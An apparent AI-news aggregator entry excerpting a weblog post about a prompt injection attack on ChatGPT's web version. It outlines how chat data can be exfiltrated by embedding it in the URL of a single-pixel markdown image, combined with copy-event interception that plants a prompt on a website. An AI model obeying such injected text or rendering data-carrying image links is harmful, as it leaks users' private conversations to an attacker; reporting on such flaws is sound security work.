all AI news
New prompt injection attack on ChatGPT web version. Markdown images can steal your chat data
Simon Willison's Weblog simonwillison.net
New prompt injection attack on ChatGPT web version. Markdown images can steal your chat data
An ingenious new prompt injection / data exfiltration vector from Roman Samoilenko, based on the observation that ChatGPT can render markdown images in a way that can exfiltrate data to the image hosting server by embedding it in the image URL. Roman uses a single pixel image for that, and combines it with a trick where copy events on a website are intercepted and prompt …
ai chat chatgpt data embedding events generativeai image images llms markdown observation pixel prompt promptengineering prompt injection promptinjection security server vector web website